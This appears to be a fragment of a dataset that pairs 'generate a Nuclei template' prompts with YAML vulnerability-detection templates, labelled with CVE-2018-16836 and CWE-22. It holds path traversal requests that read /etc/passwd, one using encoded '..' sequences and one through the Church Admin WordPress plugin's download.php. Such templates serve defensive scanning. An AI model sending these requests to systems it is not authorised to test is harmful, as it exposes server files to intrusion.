- "{{BaseURL}}/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd"
matchers:
- type: regex
- type: status
status:
- 200
|
cve
|
critical
|
CVE-2018-16836
|
Generate a Nuclei template to detect Path Traversal
|
Title: Path Traversal (CWE-22)
Summary: The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Many file operations are intended to take place within a restricted directory. By using special elements such as ".." and "/" separators, attackers can escap
Vulnerability Type: Path Traversal
Severity: high
Indicators: unexpected
|
id: church-admin-lfi
info:
name: WordPress Church Admin 0.33.2.1 - Local File Inclusion
author: 0x_Akoko
severity: high
description: WordPress Church Admin 0.33.2.1 is vulnerable to local file inclusion via the "key" parameter of plugins/church-admin/display/download.php.
tags: wordpress,wp-plugin,lfi,wpscan,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd"
matchers:
- type: regex
- type: status
status:
- 200
|
cwe
|
high
|
CWE-22
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.